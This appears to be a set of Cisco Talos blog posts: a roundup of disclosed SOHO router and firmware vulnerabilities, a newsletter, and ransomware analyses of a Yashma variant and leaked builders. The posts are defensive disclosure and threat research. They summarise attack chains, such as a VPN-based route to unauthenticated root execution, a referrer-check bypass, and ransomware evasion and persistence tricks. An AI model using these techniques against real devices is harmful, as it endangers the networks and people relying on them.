TALOS-2022-1615: This vulnerability existed in the SNMP functionality of the router. The QUARTZ-GOLD implemented a feature that allowed for custom OIDs to be defined within the router. An attacker could submit a custom OID that would be executed whenever that OID was queried. The simplest solution was to execute commands directly as the root user in the Linux shell. An adversary could leverage this vulnerability to achieve arbitrary command injection.
TALOS-2022-1610: Talos discovered this vulnerability within the web server functionality of the QUARTZ-GOLD. By basing the firmware of this device off of the FreshTomato firmware, many default features were inherited from the FreshTomato firmware that was not documented as part of the device functionality. More specifically, debug functionality was not disabled in FreshTomato and allowed a user authenticated to the web interface to issue direct Linux commands as if they had a shell. An authenticated attacker could use this vulnerability to achieve arbitrary command injection.
Observations
The Siretta QUARTZ-GOLD inherited many of the discovered vulnerabilities from the third-party code base included in the product. FreshTomato includes many features that are prebuilt but could have been disabled if the manufacturer were more familiar with the code they were building from. Much of the debugging functionality provided by FreshTomato is undocumented in the Siretta device and seems unintentionally included. When reusing large code bases, it is important to know what exactly is being included in that code base, and how it can be properly configured for the use-case the developer has in mind.
Synology SRM - RT2600ac
Research conducted by Claudio Bozzato.
Background
The Synology RT2600ac is a high-end SOHO router that runs on Synology SRM (Synology Router Manager), a Linux-based operating system for all Synology routers. Talos researchers chose to look at this product because of its popularity and reputation for quality. We submitted nine reports to Synology, of which two affect their VPN service (QuickConnect), and one affects a Qualcomm tool used in SRM, eventually leading to the disclosure of 10 CVEs. QuickConnect is Synology’s VPN service, which allows for managing routers remotely without requiring the configuration of the router to expose its management port and without having to manage DDNS services to locate the router remotely.
This research has been detailed in a dedicated blog post, which explains how Talos managed to chain some of the reported vulnerabilities to achieve remote code execution without prior authentication in SRM devices via Synology's VPN services, which are publicly accessible.
Notable Vulnerabilities
TALOS-2020-1064: When routers connect to the QuickConnect VPN, they are placed in a dedicated subnet. This report demonstrates that the subnets are, however, not logically split, so it is possible to change the assigned netmask to a larger one, allowing one to talk with any other router connected to the same VPN. The VPNs are accessible by routers upon registration against QuickConnect. But after initial registration, the router is not needed anymore, and the attack can be performed independently of the device. There are several VPNs available that are easily enumerable and seem to be geo-located.
TALOS-2020-1066: This report describes a vulnerability in iptables' rules within the router. SRM defines filtering rules to prevent access only on selected ports from LAN. However, those rules are missing for connections that come from the QuickConnect VPN. This means that any service listening on the device is remotely accessible from the VPN. This can be used together with TALOS-2020-1064 to have unrestricted communication with any network service running in a chosen device from those reachable in the VPN.
TALOS-2020-1065 - This report describes a vulnerability in Qualcomm's lbd, a service reachable via LAN on ports 7786 and 7787, which can be used without authentication to directly execute shell commands as root, whenever an attacker is on the same LAN as the router. Since this is reachable via LAN, it is also reachable via the VPN. By chaining this vulnerability with the two above, it was possible to execute arbitrary commands as root via the VPN, without prior authentication, on any selected router connected to QuickConnect.
Observations
Synology SRM provides a convenient VPN service to solve the remote management issue for SOHO routers running on a dynamic IP address. However, this research has shown that such services can also widen the attack surface. Devices exposed via DDNS normally take more effort to be discovered, usually requiring an internet-wide scan. With QuickConnect, however, all devices are easily discovered as they're all connected to the same VPN, which is publicly accessible and whose geo-located services are easily enumerable.
TCL Linkhub Mesh Wifi
Research conducted by Carl Hurd.
Background
The TCL Linkhub is one of the newest products sold by TCL and the feature set and price tag could mean a very rapid adoption rate, much like the budget TV market. Over the course of the research, Talos submitted 17 unique reports to TCL, resulting in 42 CVEs. The research on the TCL Linkhub Mesh Wi-Fi system was primarily focused on the API service that is used for all management of the device. The Linkhub does not use a web server to serve a user interface, instead, all interaction with the device is done through a phone application. This phone application interacts with the device through a ProtoBuffer-based API. This service is one of the few ports open by default and thus was the most interesting target for this research.
Notable Vulnerabilities
TALOS-2022-1463: This vulnerability existed in the code for getting and setting values in a flash of the LinkHub. This vulnerability is interesting because it was not contained in a specific library and was used in almost every binary on the device. While getting values from a flash, the function did not take into account the length of the destination buffer. An attacker could easily change a configuration value to a large value, and the next time that variable was loaded from flash, it would cause a buffer overflow. This vulnerability would lead to arbitrary code execution.
TALOS-2022-1455: This vulnerability existed in the API service that is exposed for use with the phone application. ProtoBuffer serialization is used for all communication with the device from the management application. Once the buffer is deserialized, it is dispatched to various handlers across the device. Within the set_mf_rule functionality, a memcpy occurs that determines length based on user input directly. Attackers could use this functionality to send a mf_rule message that contains fields larger than the statically sized buffers in the device. This vulnerability would lead to a buffer overflow and arbitrary code execution.
TALOS-2022-1458: This vulnerability existed in the API service that is exposed for use with the phone application. ProtoBuffer serialization is used for all communication with the device from the management application. Once the buffer is deserialized, it’s dispatched to various handlers across the device. Within the ucloud_add_node functionality, which is used to add satellites to the router mesh, a MxpManageList message is parsed directly into the system function. An attacker could use a malicious message to execute arbitrary commands using this vulnerability.
Observations
The TCL LinkHub has a unique approach to management, which changes the attack surface significantly. Choosing to utilize Protobuffers for serialization is a good decision on the developer's part, as it is a well-tested and maintained library, but once the data is unserialized, much of the input is blindly trusted since it is assumed to come from the management application. All of this data should be treated as user data and more validation should occur once deserialization occurs, prior to use in potentially dangerous functions, such as memcpy.
TP-Link TL-R600VPN
Research conducted by Jared Rittle and Carl Hurd.
Background
The TP-Link TL-R600VPN became a subject of our research for its direct involvement in the VPNFilter campaign. The TP-Link TL-R600VPN is a five-port SOHO router. This device contains a Realtek RTL8198 integrated system on a chip. This particular chip uses an offshoot of the MIPS-1 architecture developed by Lexra. This device is a fairly run-of-the-mill small router and contains network diagnostic capabilities and basic router functionality that is managed by a web server on the device. This research led to four Talos reports to TP-Link, resulting in four CVEs. For a more in-depth look at the research done on this device, refer to the corresponding blog post.
Notable Vulnerabilities
TALOS-2018-0620: This vulnerability existed in the header parsing of HTTP requests within the web server. This vulnerability was triggered by sending a request to a specific subset of pages on the web server. Once the request was made, a statically sized buffer is used for the parsed headers. An attacker could use an abnormally long header entry to overflow the buffer and overwrite the return address. This vulnerability leads to arbitrary code execution.
TALOS-2018-0619: This vulnerability existed in the network debugging functionality of the device. The ping functionality of the R600-VPN contained a parameter that was unchecked by user input. An attacker could supply an abnormally long ping_addr parameter to overflow the statically sized buffer used to hold the value, in turn overwriting the return address. This vulnerability leads to arbitrary code execution.
TALOS-2018-0618 - This vulnerability was contained within the HTTP server within the R600-VPN. The user-provided URL was parsed without regard for special characters such as "../" to navigate up a directory tree. Normally, special characters like this are removed or ignored in a URL and the directory navigation does not occur, but in the R600-VPN this navigation could be used to retrieve any files on the device. This vulnerability leads to sensitive information disclosure.
Observations
Most of the findings on the TL-R600VPN centered around the web server and the functionality provided by it. One of the simplest solutions to reduce risk is to integrate a well-tested web server instead of developing one from scratch or including untested code in the product. While some of the vulnerable code was within the web server itself, much of it was also added by the manufacturer for simple additional features, like network diagnostics. It is clear from this research that any added code needs to be reviewed to prevent these issues.
ZTE MF971R
Research conducted by Marcin Noga.
Background
The ZTE MF971R mobile router is one of the newest devices in the ZTE MF mobile routers family. At least in Poland, it is a very popular device and its popularity is due to the fact that it's being sold among others by major GSM providers or even added as a gift to some of their products/services. Over the course of the research, Talos submitted seven reports to ZTE, resulting in seven CVEs. The research on the ZTE MF971R router was primarily focused on the web application/server that is used for all management of the device. We have managed to find a set of vulnerabilities in Web APIs which chained together allowed us to create a one-click exploit, giving us full remote access to the device. See our deep dive whitepaper for a more in-depth explanation.
Notable Vulnerabilities
TALOS-2021-1317:This vulnerability is related to the implementation of CSRF protection/API restriction communication in Web APIs. To communicate with a certain set of Web APIs, a request should be sent from a 127.0.0.1 address or default router IP address — 192.168.0.1. It's verified by checking the HTTP Referer value. Unfortunately, the way the check was implemented gives an attacker the possibility to bypass it by simply adding string 127.0.0.1 in any part of a referrer URL and obtaining full access to API communication.
TALOS-2021-1320:Talos discovered this vulnerability within the implementation of the ADB_MODE_SWITCH Web API. A password parameter being a part of this API is not properly sanitized in the context of its length which leads to a stack-based buffer overflow. The victim does not need to be logged in to be affected by this vulnerability. The only constraint an attacker needs to pass is a referrer check, which is easy to bypass and has been described in TALOS-2021-1317. This remote pre-auth stack-based buffer overflow gives an attacker full control when overwriting the return address and as we demonstrated can be turned into one-click remote code execution.
Observations
The ZTE MF971R’s security suffered for several reasons. Despite visible efforts to reduce access to certain WebAPIs, it was still possible to bypass this mechanism, thus increasing the number of attack vectors. The main web server binary lacked compatibility with basic mitigations such as ASLR (Address Space Layout Randomization) and stack cookies, making the exploitation of existing vulnerabilities trivial. Improving security mechanisms in the aforementioned areas will reduce the number of attack vectors and make exploiting existing vulnerabilities, especially those without any authorization, more difficult or practically impossible.
Common frameworks
The previous section talked about the specific routers that we investigated. However, some of these routers also ran specific software that is common for many routers: open-source firmware such as OpenWrt, FreshTomato, AsusWRT or DD-WRT. One router also ran a specific kernel module called KCodes. As this software isn’t specific to the vendors we discussed in the router sections, we’re grouping the vulnerabilities we found together.
OpenWrt
Research conducted by Claudio Bozzato.
Background
OpenWrt is a Linux-based OS, primarily used on embedded devices to route network traffic. It’s highly customizable and ships with a set of tools and libraries that have been optimized to run on hardware with limited resources. Due to this, OpenWrt is a common choice among SOHO routers.
Notable Vulnerabilities
TALOS-2019-0893: This vulnerability affected the ustream-ssl library, a library that works as an SSL wrapper for OpenSSL, mbed TLS and wolfSSL. This issue describes how the library does not terminate the SSL connection immediately when a wrong certificate is supplied by an HTTPS server, allowing the client to send one request using any unverified certificate, before terminating the connection. As OpenWrt uses this library for tools like wget, any functionality relying on it would be affected by this information leak when requesting any HTTPS URL, which could allow, in the worst case, for an attacker to perform a man-in-the-middle attack and steal any sensitive information present in the request.
Observations
Because the HTTPS connection eventually terminates with an error, this issue can easily go unnoticed. As OpenWrt is a platform that is easy to customize and write scripts for, such a vulnerability may affect a large number of users.
FreshTomato
Research conducted by Francesco Benvenuto.
Background
The FreshTomato is a popular open-source firmware project. It is an actively maintained and modern firmware project that’s widely used by multiple SOHO routers. By default, it ships with several functionalities, e.g., SSH, VPN capabilities, Telnet, Routing, etc.
Notable Vulnerabilities
TALOS-2022-1642: This vulnerability existed in one of the functionalities provided by FreshTomato's HTTP server. It provides a simple template language, one of the templating functions to read the content of a file, provided by the user in a specific folder. Because no sanitization is performed and the file path is composed by concatenating the hard-coded path with the provided filename, this function is vulnerable to path traversal. An attacker with valid credentials could read any file in the file system.
TALOS-2022-1641: This vulnerability existed in one of the log-related functions provided by FreshTomato's HTTP server. The functionality allows users to find certain strings in the log file via OS commands. Because no real sanitization is performed against the user-controlled parameter, this function is vulnerable to an OS command injection vulnerability. An attacker could leverage this vulnerability to achieve arbitrary command injection.
TALOS-2022-1509: This vulnerability existed in the URL unescape functionality provided by FreshTomato's HTTP server. The unescape always assumes that there are two characters following the '%' character. However, this is not the case and opens the door to an out-of-bounds read-and-write.
Observations
Because the FreshTomato project is the base for many routers, any vulnerability found in the software could have wide-ranging consequences. We cannot fully gauge how the firmware is deployed and how much impact these vulnerabilities will have on the deployed router.
Asuswrt and Asuswrt-Merlin New Gen, DD-WRT
Research conducted by Francesco Benvenuto.
Background
Like FreshTomato, Asuswrt and Asuswrt-Merlin, New Gen and DD-WRT are the base firmware for several SOHO routers.
Notable Vulnerabilities
TALOS-2022-1511: This vulnerability existed in the URL unescape functionality provided by the Asuswrt and Asuswrt-Merlin New Gen vulnerability’s HTTP server. The unescape always assumes that there are two characters following the "%" character. However, this is not the case and could lead to an out-of-bounds read and write.
TALOS-2022-1510: This vulnerability is in the URL unescape functionality provided by the DD-WRT’s HTTP server. The unescape always assumes that there are two characters following the "%" character, however, this assumption is incorrect and could lead to an out-of-bounds read and write.
Some NETGEAR routers utilize a bespoke kernel module called NetUSB.ko from a Taiwanese company called KCodes. This module is custom-made for each device but contains similar functionality. The module shares USB devices over TCP, allowing clients to use various vendor-made drivers and software to connect to these devices in such a way that the client machine treats the remote device as a local USB device plugged into their computer. The software used for NETGEAR routers is called NETGEAR USB Control Center, and it utilizes a driver called NetUSBUDSTcpBus.sys (on Windows) for communications.
Notable Vulnerabilities
TALOS-2019-0775: Once the static AES key was recovered, an attacker could easily trigger a DoS or remote information disclosure using a single opcode after the handshake.
TALOS-2019-0776: Similar to TALOS-2019-0775, this vulnerability leaks memory. In this case, it leaks very useful memory such as stack boundary addresses, a pointer to a specific configuration function and notably or the base address of the running kernel module NetUSB.ko. This could potentially be combined with other remote attacks that could leverage this data when designing a specific payload for the target.
Observations
Many other products use NetUSB.ko. A previously disclosed vulnerability in 2015 led researchers to believe a flaw in this very kernel module potentially existed in as many as 92 products across multiple vendors. For this analysis, we utilized the R8000 hardware to test the R8000 version of NetUSB.ko (1.0.2.66) and the R7900 version (1.0.2.69) since both modules are compiled for the same kernel. Specifically, the information disclosed in TALOS-2019-0776 appears to be particularly useful for recovering sensitive memory addresses for payload generation, regardless of the architecture/operating system that uses the kernel module.
Key observations
SOHO routers are generally valuable targets for adversaries due to their position within the network and wide adoption within common network deployments. Their relatively low cost, wide availability, ease of acquisition and user-friendly management features leads to these products being in many homes, small and home offices, warehouses, coffee shops and many other businesses. They are even deployed as gateways providing remote access to industrial environments.
Vulnerabilities in these routers can provide entry to a huge variety of targets, and the same vulnerability can be used for impact, meaning these routers are high-value targets for malicious actors.
The security posture of these lower-cost routers has improved over the last few years, but in general, security advice for these devices is the same as it has been in the past. Some of the important security tenants for manufacturers are:
Features and services should be disabled by default unless they are critical for the operation of the device.
WAN-side management should be deactivated by default.
Support modern security features such as TLS/SSL encryption and make sure they're implemented properly.
Never trust user input.
Keep third-party code up-to-date.
Audit or familiarize yourself with integrated code.
Don’t rely on obscure and undocumented diagnostic features or credentials.
Each of the vulnerabilities discovered fall into one of these categories. Code quality is always going to be an additional concern, and the utilization of safe functions should always be enforced during development. Ideally, use static analysis tooling during development. This may not be financially viable for many products hoping to keep consumer costs low. In this case, lean on compiler warnings and any other methods of ensuring the highest code quality possible.
Simple changes to the development process can mitigate many of the worst effects of these issues. Memory corruption, one of the most glaring vulnerabilities, can be mitigated by using memory-safe languages (i.e., Rust and Go). If safe languages are not an option, vendors should make sure to implement as many mitigations as possible, both compiler-based and OS-based. Examples of these mitigations would be non-executable stacks and address space layout randomization (ASLR).
The next most helpful change involves defining user interaction boundaries. Generic strings are notoriously difficult to parse or apply access controls to. By utilizing a well-defined API boundary, it is easier to validate user requests and input. The boundary also acts as an access control list to prevent a malicious user from executing arbitrary commands or providing input that would result in other unexpected behavior.
The most important security step a user of these devices can take is to assess each service present on the device. Verify that each service running is required for the day-to-day operation of each device, and disable all extraneous services. Services that cannot be disabled should be restricted to absolute minimal access or completely blocked using alternative methods, such as firewall rules to block traffic. During the acquisition process, if possible, basic research should be done to ensure the devices have sane, secure defaults enabled, such as the use of encrypted protocols for remote access and administration, if applicable. Start your assessment by reading the router user manually thoroughly, even before purchase. The quality of details concerning device features in a user manual is often indicative of the overall product quality.
While the security posture of SOHO routers has generally improved, many could benefit from low-cost mitigations that would drastically improve their security posture. Over the past few years, Talos has published 141 advisories covering 289 CVEs within 13 SOHO and industrial routers and six common frameworks. Talos vulnerability research is always driven by the mandate to protect Cisco customers, but we also aim to improve the security of all devices we research. All research has been publicly disclosed, after disclosure to the vendor, according to Cisco’s vulnerability disclosure policy. These disclosures directly result in vulnerability remediations that improve the security posture of anyone using these devices.
Vulnerability List
This blog post included a summary of each router and a few select vulnerabilities. Below is a list of all the advisories Talos disclosed post-VPNFilter.
From new ransomware groups, a growing mercenary space, espionage campaigns, supply chain attacks, and new “as a service” tools popping up, there's a lot to talk about already in the first half of 2023.
Here are the main threats we've covered on our blog up until the end of June 2023. The timeline is a blend of threat advisory articles, and long-term research that our analysts have been working on for a while.
Be sure to subscribe to blog.talosintelligence.com to get future blogs sent straight to your inbox. You can also follow our ongoing Vulnerability Roundup series, where we run down the latest vulnerabilities, attack scenarios, and coverage.
Threat trends
Many of the threats we've written about this year have involved extortion as part of the attackers’ plans. We've seen threat actors utilize every chance they get to steal sensitive data, to be used in future attacks and/or to manipulate victims into paying up before their data ends up on the dark web. Another growing trend is the mercenary landscape – “hackers for hire” growing their wares and increasingly commercializing tools, such as spyware.
The mercenary space is a topic we'll talk more about in the “2023 Year in Review” which Cisco Talos researchers, detection specialists, linguists, threat hunters, incident responders, and analysts are now actively working on, and will be published later this year.
Last year’s inaugural report represented an unprecedented effort within Cisco to tell a comprehensive story of our work, relying on a wide variety of data and expertise. This year, we are bringing all these elements together again, to report on how the threat landscape has changed from 2022 and delve deep into some of the most notorious and impactful threats of 2023.
Welcome to this week’s edition of the Threat Source newsletter.
The time has come once again for all of us (well, not me specifically but lots of other Talos people) to descend on Las Vegas for Hacker Summer Camp. Cisco Talos will be well-represented at BlackHat and DEF CON over the course of the next few weeks with a slew of presentations, demos and appearances to speak to the security community.
As always, we’ll be at the Cisco booth at BlackHat, located just north of the main entrance (it’s #1532 if you’re searching!). If you need help finding us, download the BlackHat app to see a map of the entire conference. Talos researchers will be at the booth throughout the conference to give lightning talks on a wide range of topics — everything from machine learning to the basics of spotting phishing emails. New talks will take place every other half hour starting at 10 a.m. local time on Wednesday.
We’ll also have a presence at the BlackHat Career Zone — diagonal from Startup City on the show floor at Kiosk #CZ2 — throughout the conference, where you can talk to us about current job openings, ask for advice on career advancement or just talk about future opportunities for how you could become part of our team. On Thursday, Aug. 10, from 10 a.m. - noon local time, we’ll have Talos hiring managers at the Cisco booth to also talk about potential job opportunities.
The highlight of BlackHat is our sponsored talk on Aug. 9 at 11:30 a.m. local time in Business Hall Theater A. Nick Biasini, our head of Outreach, joins Cisco’s Vice President of Product Management for Threat, Detection and Response A.J. Shipley to talk about Cisco XDR. Learn how the newest offering from Cisco Secure combines telemetry from multiple sources and applies analytics to uncover malicious activities and attacker tactics, techniques and procedures (TTPs).
The following week at DEF CON, Vitor Ventura and Asheer Malhotra will be at the Crypto and Privacy Village, delivering a talk on “Mercenary” threat actors and the spyware they create on the Saturday of the conference at 6 p.m local time. Asheer and Vitor have written extensively about this topic and why the malware they’re creating and selling is potentially more dangerous than “traditional” spyware.
Keep an eye out on our Twitter (or X, whatever we’re calling it) for more information about a live Beers with Talos podcast recording and other opportunities to ask our researchers questions.
If you're flying out to Vegas for either conference, make sure to bookmark our Half-Year in Review to read during your travels. This is a great overview of the top threats of 2023 so far this year and looks at where the cybersecurity landscape might head next.
The one big thing
Since the discovery of the high-profile VPNFilter malware in 2018, our vulnerability research team has had a renewed focus on small and home office (SOHO) wireless routers. These are devices that are present in almost every house and business in the modern world because they are necessary to deliver the internet to multiple devices everyone possesses and relies on today. Over the past four-plus years, Talos worked with multiple vendors to disclose and patch nearly 290 CVEs in a wide range of products and libraries these routers use. This week, we released a full rundown of all these vulnerabilities and what the major takeaways are for users and the manufacturers behind these products.
Why do I care?
Given the privileged position these devices occupy on the networks they serve, they are prime targets for attackers, so their security posture is of paramount importance. However, they are also often deployed without a sophisticated security team in place to mitigate vulnerabilities. These routers are usually connected to the internet directly and all local network traffic passes through these devices. Since VPNFilter, Talos has investigated 13 SOHO and industrial routers from various vendors. Our reports to these vendors resulted in appropriate Snort network intrusion detection coverage and several security fixes from each vendor. These fixes help customers who deploy Cisco Secure solutions and improve the security posture of anyone using these devices once the vulnerabilities are patched.
So now what?
The most important security step a user of these devices can take is to assess each service present on the device. Verify that each service running is required for the day-to-day operation of each device and disable all extraneous services. Services that cannot be disabled should be restricted to absolute minimal access or completely blocked using alternative methods, such as firewall rules to block traffic. During the acquisition process, if possible, basic research should be done to ensure the devices have sane, secure defaults enabled, such as the use of encrypted protocols for remote access and administration, if applicable.
Top security headlines of the week
American military officials and cybersecurity experts are actively hunting for malware that is reportedly loaded onto systems belonging to major power and water suppliers and communications systems that service U.S. military bases. A new report from the New York Times states that the malware is a “ticking time bomb” that could disrupt U.S. military operations in the event of a direct or indirect military conflict with China. Sources in the report indicated that the malware comes from a Chinese state-sponsored actor that may be working for the People’s Liberation Army. While the government is still actively hunting for the malicious code, it is apparently hidden deep within targeted networks and has taken months to find. Microsoft and the White House disclosed that Chinese state-sponsored actors accessed the emails of at least two dozen American organizations, including some federal government agencies. (The New York Times, CNN)
The effects of the MOVEit data breach continue to spread. Government contractor Maximus disclosed last week that, although its systems were not directly affected by the Clop ransomware gang’s attack on the MOVEit file transfer software, as many as 8 million to 11 million individuals’ personal information may have been compromised. The company said in a filing to the U.S. Securities and Exchange Commission that attackers may have accessed files that "contain personal information, including Social Security numbers, protected health information, and/or other personal information, of at least 8-to-11 million individuals.” Clop claims on its leak site that it stole 169 GB of data from Maximus. More than 200 organizations have reportedly been affected by the MOVEit breach. (TechCrunch, Dark Reading)
Russian state-sponsored actors are suspected to be behind a series of denial-of-service attacks against multiple Italian banks on Wednesday, leaving many consumers unable to access their accounts. Italy’s cybersecurity agency said at least five banks were affected, though they were able to restore services fairly quickly. The group NoName057(16) took credit for the attacks on its Telegram channels, accusing Italian government officials of being anti-Russian and supporting Ukraine. Security researchers said the DDoS attacks caused “short-lived disruption with little to no wider consequence.” Actors with potential links to Russia have been behind several recent high-profile denial-of-service attacks, including against video game company Blizzard and Microsoft Outlook. (Reuters, The Record by Recorded Future)
Caitlin Huey, Susan Paskey and Alexis Merritt present a "Level Up Lab" titled "Don’t Fail Knowledge Checks: Accelerating Incident Response with Threat Intelligence." Participate in several fast-paced activities that emphasize the importance of threat intelligence in security incident investigations. Attendees will act as incident responders investigating a simulated incident that unfolds throughout this session. Periodic checkpoints will include discussions that highlight how incident response and threat intelligence complement each other during an active security investigation.
Nicole Hoffman and James Nutland discuss the MIRE ATT&CK framework in “One Leg to Stand on: Adventures in Adversary Tracking with ATT&CK.” Even though ATT&CK has become an industry standard for cyber threat intelligence reporting, all too often, techniques are thrown at the bottoms of reports and blogs without any context never to be seen again after dissemination. This is not useful for intelligence producers or consumers. In this presentation, Nicole and James will show analysts how to use ATT&CK as a guideline for creating a contextual knowledge base for adversary tracking.
Most prevalent malware files from Talos telemetry over the past week
Cisco Talos discovered an unknown threat actor, seemingly of Vietnamese origin, conducting a ransomware operation that began at least as early as June 4, 2023.
This ongoing attack uses a variant of the Yashma ransomware likely to target multiple geographic areas by mimicking WannaCry characteristics.
The threat actor uses an uncommon technique to deliver the ransom note. Instead of embedding the ransom note strings in the binary, they download the ransom note from the actor-controlled GitHub repository by executing an embedded batch file.
Threat actor analysis
Talos assesses with high confidence that this threat actor is targeting victims in English-speaking countries, Bulgaria, China and Vietnam, as the actor’s GitHub account, “nguyenvietphat,” has ransomware notes written in these countries’ languages. The presence of an English version could indicate the actor intends to target a wide range of geographic areas.
Talos assesses with moderate confidence that the threat actor may be of Vietnamese origin because their GitHub account name and email contact on the ransomware notes spoofs a legitimate Vietnamese organization’s name. The ransom note also asks victims to contact them between 7 and 11 p.m. UTC+7, which overlaps with Vietnam’s time zone. We also spotted a slight difference in the Vietnamese language ransom note, as it starts with, “Sorry, your file is encrypted!” in contrast to the others that begin with, “Oops, your files are encrypted!” By saying “sorry,” the threat actor may have intended to show a heightened sensitivity toward victims in Vietnam, which could indicate the attackers themselves are Vietnamese.
We further assess the threat actor began this campaign around June 4, 2023, because they joined GitHub and created a public repository called “Ransomware” on that date, which overlaps with the compilation date of the ransomware binary. In the repository, they added ransom note text files in five languages: English, Bulgarian, Vietnamese, Simplified Chinese and Traditional Chinese.
GitHub repository that contains ransom notes.
Ransom note
The actor demands the ransom payment in Bitcoins to the wallet address “bc1qtd4qv0wmgtu2rdr0wr8tka2jg44cgmz04z5mc7” and they double the ransomware price if the victim fails to pay within three days, according to our ransomware note analysis. The actor has an email address, “nguyenvietphat[.]n[at]gmail[.]com,” for the victims to contact them. At the time of our analysis, we had not observed any Bitcoin in the wallet, and the ransom note did not specify an amount, indicating the ransomware operation might still be in a nascent stage.
The ransom note text resembles the well-known WannaCry ransom note, possibly to obfuscate the threat actor’s identity and confuse incident responders.
The ransom note for WannaCry ransomware.
Ransom notes samples of the Yashma variant.
After encryption, the Yashma ransomware variant sets the wallpaper on the victim’s machine, as seen in the image below. It seems that the operator downloaded this picture from www[.]FXXZ[.]com and embedded it in the Yashma variant binary. The wallpaper set by the Yashma variant in the victim’s machine also mimics the WannaCry ransomware.
Yashma variant wallpaper (left) and WannaCry wallpaper (right).
Customized Yashma ransomware variant
The actor deployed a variant of Yashma ransomware, which they compiled on June 4, 2023. Yashma is a 32-bit executable written in .Net and a rebranded version of Chaos ransomware V5, which appeared in May 2022. In this variant, most of Yashma’s features remained unchanged and have been described by the security researchers at Blackberry, with the exception of a few notable modifications.
Usually, ransomware stores the ransom note text as strings in the binary. However, this variant of Yashma executes an embedded batch file, which has the commands to download the ransom note from the actor-controlled GitHub repository. This modification evades endpoint detection solutions and anti-virus software, which usually detect embedded ransom note strings in the binary.
Contents of the batch file.
Earlier versions of the Yashma ransomware established persistence on the victim machine in the Run registry key and by dropping a Windows shortcut file pointing to the ransomware executable path in the startup folder. The variant we observed also established persistence in the Run registry key. Still, it was modified to create a “.url” bookmark file in the startup folder that points to the dropped executable located at “%AppData%\Roaming\svchost.exe”.
A function that creates the bookmark file.
One notable feature the threat actor chose to keep in this variant is Yashma’s anti-recovery capability. After encrypting a file, the ransomware wipes the contents of the original unencrypted files, writes a single character “?” and then deletes the file. This technique makes it more challenging for incident responders and forensic analysts to recover the deleted files from the victim’s hard drive.
The code snippet shows the anti-recovery feature of the ransomware.
Coverage
Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.
Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.
Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.
Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.
Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.
Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.
Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.
Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.
Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. Snort SIDs for this threat are 62131 - 62143 and 300633 - 300638.
ClamAV detections are available for this threat:
Win.Ransomware.Hydracrypt-9878672-0
Cisco Secure Endpoint users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are infected with this specific threat. For specific OSqueries on this threat, click here.
IOCs
Indicators of Compromise associated with this threat can be found here.
This trend is already continuing this year. Since 2021, there have been multiple leaks of ransomware source code and builders — components that are essential to creating and modifying ransomware. This has had a significant effect on the threat landscape, giving unsophisticated actors the ability to easily generate their own ransomware with little effort or knowledge. As more actors enter this space, Cisco Talos is seeing an increasing number of ransomware variants emerge, leading to more frequent attacks and new challenges for cybersecurity professionals, particularly regarding actor attribution.
Code leaks are benefitting threat actors
Since September 2021, we have seen actors publicly disclosing source code and builders for prominent ransomware families, including Babuk, Conti, LockBit 3.0 and Chaos. In some cases, such as LockBit 3.0’s ransomware builder, these leaks have been intentional, with affiliates posting these tools and codes to protest against broader group policies they are unhappy with. In other instances, such as the Babuk source code, the leaks were seemingly an operational error. Regardless of the cause, these leaks are having a significant effect on the threat landscape, making it easier for novice or unskilled actors to develop their own ransomware variants without much effort or knowledge.
Ransomware source code is a malicious program that contains the instructions and algorithms that define the ransomware’s behavior. It is usually complex and often requires skilled technicians to create. Therefore, having access to such code allows threat actors with minimum programming knowledge to modify and compile their own ransomware variants.
Ransomware builders usually have a user interface that allows users to choose the underlying features and customize the configurations to build a new ransomware binary executable without exposing the source code or needing a compiler installed. The availability of such builders allows novice actors to generate their own customized ransomware variants. An example of a leaked Chaos ransomware builder V5 is shown in the picture below.
When ransomware source code or builders are leaked, it becomes easier for aspiring cybercriminals who lack the technical expertise to develop their own ransomware variants by making only minor modifications to the original code. Additionally, by using leaked source code, threat actors can confuse or mislead investigators, as security professionals may be more likely to misattribute the activity to the wrong actor.
New variants based on leaked code are becoming more common
We have continued seeing various malicious campaigns since the start of 2023, where the threat actors have used new ransomware variants based on leaked source code or builders. Early this year, Talos discovered a new ransomware family called MortalKombat generated by the leaked Xorist ransomware builder. Xorist ransomware, which operates under the RaaS model, has a builder called “Encoder Builder v.24” that is available on underground forums. Based on our research, we discovered an unknown threat actor using MortalKombat ransomware since December 2022 to target individuals and smaller companies. This campaign has a multi-stage attack chain that begins with a phishing email delivered to victims impersonating CoinPayments, a legitimate global cryptocurrency payment gateway.
In April, Talos discovered a new ransomware actor, RA Group, conducting double extortion attacks using their ransomware variant based on leaked Babuk source code. Babuk, a Russian ransomware group that emerged in 2021, has conducted a series of high-profile ransomware attacks across various industries, including government, healthcare, logistics, and professional services. Since an alleged member of the Babuk group leaked the full source code of its ransomware in September 2021, several new variants based on the leaked code have emerged, with many appearing in 2023, including ESXiArgs, Rorschach and RTM Locker, in addition to RA Group. RA Group, in its ongoing campaigns, has targeted the U.S., South Korea, Taiwan, the U.K. and India across several business verticals, including manufacturing, wealth management, insurance providers, pharmaceuticals and financial management consulting companies.
Most recently, Talos observed a surge in new ransomware strains emerging from the Yashma ransomware builder. Yashma ransomware builder, which first appeared in May 2022, is a rebranded version of the Chaos ransomware builder V5, which was leaked in April 2022. Since early 2023, we have seen several new Yashma strains emerge, including ANXZ, Sirattacker, and Shadow Men Team. Shadow Men Team — whose name we derived from a translation of their Hindi name in the ransom note — appears to be a new actor in the ransomware space. The actors appear to target victims in Kuwait, as the ransom note demands payment in Kuwaiti dinar before translating that sum to its U.S. dollar equivalent in Bitcoin.
Another new actor we discovered, seemingly of Vietnamese origin, uses a Yashma ransomware variant to target victims in Bulgaria, China, Vietnam and other countries. The campaign started in at least June 2023, and the ransom note appears to mimic certain aspects of the ransom note used in the global WannaCry attacks from 2017.
Actors repurposing leaked code are demanding low ransom payments
